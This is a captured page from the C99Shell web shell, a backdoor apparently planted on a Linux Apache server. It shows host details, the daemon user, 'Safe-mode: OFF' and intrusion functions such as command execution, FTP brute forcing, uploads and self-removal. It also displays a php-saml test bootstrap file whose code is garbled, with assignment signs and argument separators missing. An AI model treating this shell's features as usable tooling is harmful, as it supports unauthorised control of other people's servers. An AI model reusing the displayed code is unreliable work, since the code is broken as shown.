!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/vendor/onelogin/php-saml/tests/   drwxrwxr-x
Free 15.63 GB of 61.93 GB (25.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bootstrap.php (1.68 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

ob_start
();

$basePath dirname(dirname(__FILE__));

require_once 
$basePath.'/_toolkit_loader.php';

if (!
defined('TEST_ROOT')) define('TEST_ROOT'dirname(__FILE__));

if (!
defined('XMLSECLIBS_DIR')) define('XMLSECLIBS_DIR'$basePath.'/extlib/xmlseclibs/');
require_once 
XMLSECLIBS_DIR 'xmlseclibs.php';

if (!
defined('ONELOGIN_SAML_DIR')) define('ONELOGIN_SAML_DIR'$basePath.'/lib/Saml/');
require_once 
ONELOGIN_SAML_DIR 'AuthRequest.php';
require_once 
ONELOGIN_SAML_DIR 'Response.php';
require_once 
ONELOGIN_SAML_DIR 'Settings.php';
require_once 
ONELOGIN_SAML_DIR 'Metadata.php';
require_once 
ONELOGIN_SAML_DIR 'XmlSec.php';

if (!
defined('ONELOGIN_CUSTOMPATH')) {
    
define('ONELOGIN_CUSTOMPATH'dirname(__FILE__).'/data/customPath/');
}

date_default_timezone_set('America/Los_Angeles');


if (!
function_exists('getUrlFromRedirect')) {
    
/**
    * In phpunit when a redirect is executed an Excepion raise,
    * this funcion Get the target URL of the redirection
    * 
    * @param array $trace Trace of the Stack when an Exception raised
    *
    * @return string $targeturl Target url of the redirection
    */
    
function getUrlFromRedirect($trace
    {
        
$param_args $trace[0]['args'][4];
        
$targeturl $param_args['url'];
        return 
$targeturl;
    }
}

if (!
function_exists('getParamsFromUrl')) {
    
/**
    * Parsed the Query parameters of an URL.
    * 
    * @param string $url The URL
    *
    * @return array $parsedQuery Parsed query of the url
    */
    
function getParamsFromUrl($url
    {
        
$parsedUrl parse_url($url);
        
$query $parsedUrl['query'];
        
parse_str($query$parsedQuery);
        return 
$parsedQuery;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.2934 ]--